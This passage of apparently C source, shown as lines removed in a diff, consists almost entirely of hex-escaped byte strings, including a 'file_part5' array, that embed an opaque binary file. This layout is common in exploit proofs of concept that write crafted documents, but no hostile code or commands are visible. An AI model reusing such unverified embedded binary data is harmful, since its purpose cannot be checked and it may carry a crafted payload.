-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00" -"\x00\x03\x24\x01\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01" 
-"\x67\x64\x3e\x75\xec\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x05" -"\x0a\x76\x00\x00\x18\x76\x00\x00\x19\x76\x00\x00\x1b\x76\x00\x00" -"\x1c\x76\x00\x00\x1e\x76\x00\x00\x1f\x76\x00\x00\x21\x76\x00\x00" -"\x22\x76\x00\x00\x24\x76\x00\x00\x25\x76\x00\x00\x27\x76\x00\x00" -"\x28\x76\x00\x00\x31\x76\x00\x00\x32\x76\x00\x00\xa9\x76\x00\x00" -"\xb7\x76\x00\x00\xfe\x76\x00\x00\x02\x77\x00\x00\x04\x77\x00\x00" -"\x15\x77\x00\x00\x23\x77\x00\x00\x3d\x77\x00\x00\x72\x78\x00\x00" -"\x73\x78\x00\x00\x4a\x79\x00\x00\x4b\x79\x00\x00\x6e\x79\x00\x00" -"\x7a\x79\x00\x00\x99\x79\x00\x00\xde\x79\x00\x00\x1e\x7a\x00\x00" -"\x64\x7a\x00\x00\x91\x7a\x00\x00\x59\x7b\x00\x00\x89\x7b\x00\x00" -"\xb0\x7b\x00\x00\xde\x7b\x00\x00\xdf\x7b\x00\x00\xf0\x7b\x00\x00" -"\xf5\x7b\x00\x00\xf6\x7b\x00\x00\xfc\x7b\x00\x00\xfd\x7b\x00\x00" -"\xf3\xe6\xdc\xd2\xdc\xd2\xdc\xd2\xdc\xd2\xc5\xbe\xb7\xb0\xac\xa8" -"\xac\xa8\xac\xa4\xa0\xa4\xac\x9c\xac\x9c\x93\xac\x9c\xac\x93\xac" -"\x93\xac\x93\xac\x8e\xac\x8a\x85\x7b\x75\x7b\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x16\x68\x2e\x20\xb9" -"\x00\x30\x4a\x17\x00\x00\x13\x03\x6a\x00\x00\x00\x00\x16\x68\x2e" -"\x20\xb9\x00\x30\x4a\x17\x00\x55\x08\x01\x09\x16\x68\x2e\x20\xb9" -"\x00\x68\x08\x00\x06\x16\x68\x2e\x20\xb9\x00\x00\x09\x16\x68\x45" -"\x6d\x47\x00\x36\x08\x81\x10\x16\x68\x45\x6d\x47\x00\x35\x08\x81" -"\x3e\x2a\x01\x43\x4a\x1c\x00\x00\x06\x16\x68\x02\x75\x3b\x00\x00" -"\x06\x16\x68\x55\x3b\x1b\x00\x00\x06\x16\x68\x1e\x3b\x1d\x00\x00" -"\x06\x16\x68\x52\x59\xd7\x00\x00\x06\x16\x68\x45\x6d\x47\x00\x00" -"\x0c\x15\x68\x3e\x75\xec\x00\x16\x68\x45\x6d\x47\x00\x00\x0c\x15" -"\x68\x3e\x75\xec\x00\x16\x68\x3e\x75\xec\x00\x00\x0c\x15\x68\x1e" -"\x3b\x1d\x00\x16\x68\x45\x6d\x47\x00\x00\x18\x15\x68\x1e\x3b\x1d" -"\x00\x16\x68\x1e\x75\x1d\x00\x50\x4a\x03\x00\x6e\x48\x04\x08\x74" -"\x48\x04\x08\x00\x12\x16\x68\x55\x3b\x1b\x00\x50\x4a\x03\x00\x6e" 
-"\x48\x04\x08\x74\x48\x04\x08\x00\x12\x16\x68\x1e\x3b\x1d\x00\x50" -"\x4a\x03\x00\x6e\x48\x04\x08\x74\x5e\x04\x08\x00\x18\x15\x68\x3e" -"\x75\xec\x00\x16\x68\x45\x6d\x47\x00\x50\x4a\x03\x00\x6e\x48\x04" -"\x08\x74\x48\x04\x08\x00\x18\x15\x68\x3e\x75\xec\x00\x16\x68\x3e" -"\x75\xec\x00\x50\x4a\x03\x00\x6e\x48\x04\x08\x74\x48\x04\x08\x2b" -"\x36\x76\x00\x00\x37\x76\x00\x00\x3a\x76\x00\x00\x3f\x76\x00\x00" -"\x48\x76\x00\x00\x57\x76\x00\x00\x60\x76\x00\x00\x41\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x03\x24\x01" -"\x12\x64\x24\xff\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61" -"\x24\x01\x00\xbd\x00\x00\x6b\x64\x7a\x1c\x00\x00\x16\x24\x01\x17" -"\x24\x01\x49\x66\x01\x00\x00\x00\x02\x96\x46\x00\x05\xd6\x18\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x08\xd6\x88\x00\x06\xba\xff\x0d\x03" -"\xcf\x08\xab\x11\x08\x18\x57\x1f\xb4\x25\x00\x06\x53\x03\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\xc2\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\xdc\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x4f\x07\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x17\xf6\x03\x00\x00\x18" 
-"\xf6\x03\x00\x00\x1a\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1b" -"\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1c\xd6\x18\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x1d\xd6\x18\x00\x00\x00\xff\x00\x00\x65\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\x61\xf6\x03\x00\x00\x00\x06" -"\x60\x76\x00\x00\x64\x76\x00\x00\x65\x76\x00\x00\x68\x76\x00\x00" -"\x6d\x76\x00\x00\x79\x76\x00\x00\x88\x76\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\x6d\x1d\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x68\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" 
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\x88\x76\x00\x00\x90\x76\x00\x00\x94\x76\x00\x00\x95\x76\x00\x00" -"\x98\x76\x00\x00\x9e\x76\x00\x00\xa9\x76\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\x60\x1e\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x80\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\xcd\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -; -char file_part5[]= -"\xa9\x76\x00\x00\xb8\x76\x00\x00\xc4\x76\x00\x00\xc9\x76\x00\x00" -"\xca\x76\x00\x00\xcd\x76\x00\x00\xd2\x76\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\x53\x1f\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" 
-"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\xd2\x76\x00\x00\xdd\x76\x00\x00\xec\x76\x00\x00\xf5\x76\x00\x00" -"\x03\x77\x00\x00\x04\x77\x00\x00\x07\x77\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x7e\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\x46\x20\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\x7b\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\x07\x77\x00\x00\x0b\x77\x00\x00\x15\x77\x00\x00\x24\x77\x00\x00" -"\x2e\x77\x00\x00\x3c\x77\x00\x00\x3d\x77\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\x39\x21\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" 
-"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\x17\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x6d\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\x3d\x77\x00\x00\x3e\x77\x00\x00\xc8\x77\x00\x00\xac\x78\x00\x00" -"\x4b\x79\x00\x00\x6f\x79\x00\x00\xdd\x79\x00\x00\xde\x79\x00\x00" -"\x1f\x7a\x00\x00\x63\x7a\x00\x00\x64\x7a\x00\x00\x92\x7a\x00\x00" -"\x58\x7b\x00\x00\x59\x7b\x00\x00\x8a\x7b\x00\x00\xb1\x7b\x00\x00" -"\xdf\x7b\x00\x00\xf0\x7b\x00\x00\x06\x7c\x00\x00\x17\x7c\x00\x00" -"\x18\x7c\x00\x00\x19\x7c\x00\x00\x1a\x7c\x00\x00\xf7\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xcb\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xcb\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xc3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xc1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xc1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x01\x00\x00\x00\x07\x16\x00\x03\x24\x02\x61\x24\x02" -"\x67\x64\xa5\x49\x73\x00\x00\x04\x16\x00\x03\x24\x02\x61\x24\x02" -"\x00\x07\x00\x00\x03\x24\x02\x12\x64\x10\xff\x00\x00\x61\x24\x02" -"\x00\x13\x00\x00\x03\x24\x01\x0d\xc6\x05\x00\x01\x68\x01\x00\x0f" -"\x84\x65\x01\x11\x84\x9b\xfe\x12\x64\x68\x01\x01\x00\x5e\x84\x65" -"\x01\x60\x84\x9b\xfe\x61\x24\x01\x00\x0a\x00\x00\x03\x24\x03\x12" -"\x64\x38\xff\x00\x00\x61\x24\x03\x67\x64\x02\x75\x3b\x00\x00\x07" -"\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00\x00\x61\x24\x03\x00\x16" -"\xfd\x7b\x00\x00\xfe\x7b\x00\x00\xff\x7b\x00\x00\x04\x7c\x00\x00" -"\x05\x7c\x00\x00\x18\x7c\x00\x00\x19\x7c\x00\x00\x1a\x7c\x00\x00" -"\xf4\xea\xe5\xdf\xdb\xd7\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 